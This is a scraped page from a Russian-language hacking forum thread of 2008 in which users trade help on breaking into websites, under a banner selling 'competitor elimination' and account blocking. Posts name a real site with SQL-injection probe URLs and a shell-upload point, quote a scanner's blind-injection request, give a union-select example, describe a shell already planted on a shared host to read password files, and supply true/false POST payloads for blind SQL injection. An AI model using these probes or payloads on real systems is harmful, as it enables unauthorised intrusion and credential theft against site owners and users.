УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 121 из 2438

121

Опции темы

Поиск в этой теме

Опции просмотра

#1201

15.03.2008, 20:24

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

Отправить сообщение для MaSter GeN с помощью ICQ

да конечно вот ссылка

Код:

http://www.nbc40.net/includes/pgstat.asp?pg=1'

и сдесь

Код:

http://www.nbc40.net/pages/newspix/newspix.asp?ID=10'

возможность залития шелла в папку аплоадс через вот сдесь

Код:

http://www.nbc40.net/pages/upload.php

ну и вообше на сервере дотупны к просмотрю все папки

+раскрытие путей
но хотело бы добить скуль

не с ковычками не без не со скобками не без не идет

#1202

15.03.2008, 20:37

4y4o

Познающий

Регистрация: 22.01.2007

Сообщений: 40

Провел на форуме:
179857

Репутация: 4

Просканил сайтик Acunetix.Web.Vulnerability.Scanner сканером. Выдало Blind SQL/XPath injection.

View HTTP headers
Request
POST /index.php?page=uvod HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.site.ru
Content-Length: 134
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm

username=111-222-1933email@address.tst&pass=111-222-1933email@address.tst'+%7C%7C+'ACUtwoACU&pass1=111-222-1933email@address.tst&b1=Ok

Как заюзать в этом случае инъекцию? Как использовать пост запрос на практике? Помогите новичку. Подробней если можна

#1203

15.03.2008, 20:43

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

ну про пост запросы если пользуешься лисой качаешьшь аддон на нее "tamper data"
включаешь и редактируешь заголовки и post!

#1204

15.03.2008, 20:44

~~Piflit~~

Banned

Регистрация: 11.08.2006

Сообщений: 1,522

Провел на форуме:
5128756

Репутация: 2032

Отправить сообщение для Piflit с помощью ICQ

Цитата:

Сообщение от MaSter GeN

urlparams удобнее

#1205

15.03.2008, 20:47

4y4o

Познающий

Регистрация: 22.01.2007

Сообщений: 40

Провел на форуме:
179857

Репутация: 4

Цитата:

Сообщение от MaSter GeN

я прошу объяснить как это всё дело работает и как его применить на практике. Тоесть что и куда инжектится? Что подставить в запрос, чтоб добыть инфу. Примеры если можна.
p.s Типа http://site.ru/ITC/news.php?id=-773+union+select+1,version(),3,4,5/*

#1206

15.03.2008, 20:49

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

Цитата:

Сообщение от 4y4o

постучись в аську обьясню что бы тему не засорять !

аська в профиле !
2Piflit ну енто кума как

Я к temper привык

#1207

15.03.2008, 22:52

inlanger

Познавший АНТИЧАТ

Регистрация: 07.01.2007

Сообщений: 1,263

Провел на форуме:
3326855

Репутация: 702

Люди, помогите с таким делом.
Залил шелл на сайт, на нём несколько сайтов.
у каждого сайта есть файл passwd,v, файл не пустой(до 1кб), но когда я пытаюсь его открыть мне пишет - File does not exists (/home/wmasta9/etc/сайт/passwd%2Cv)!

#1208

16.03.2008, 00:28

~~Piflit~~

Banned

Регистрация: 11.08.2006

Сообщений: 1,522

Провел на форуме:
5128756

Репутация: 2032

inlanger c урл кодировкой траблы. попробуй другой шелл.

#1209

16.03.2008, 01:30

4y4o

Познающий

Регистрация: 22.01.2007

Сообщений: 40

Провел на форуме:
179857

Репутация: 4

мда про блинд иьекцию никто ничё не знает. а мож сканер врёт?

#1210

16.03.2008, 01:44

blackybr

♠ ♦ ♣ ♥

Регистрация: 18.05.2006

Сообщений: 1,828

Провел на форуме:
8042357

Репутация: 3742

Отправить сообщение для blackybr с помощью ICQ

Отправить сообщение для blackybr с помощью AIM

Отправить сообщение для blackybr с помощью Yahoo

пошли два постзапроса и проверь. на ппример (поиграй с кавычкой и and/or)

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 1=1/*&pass1=111111&b1=Ok

и

POST /index.php?page=uvod HTTP/1.0

username=aqwerty&pass=11111' or 2=1/*&pass1=111111&b1=Ok

и посмотри разные ли ответы сервера

__________________

Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2

Страница 121 из 2438

121

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход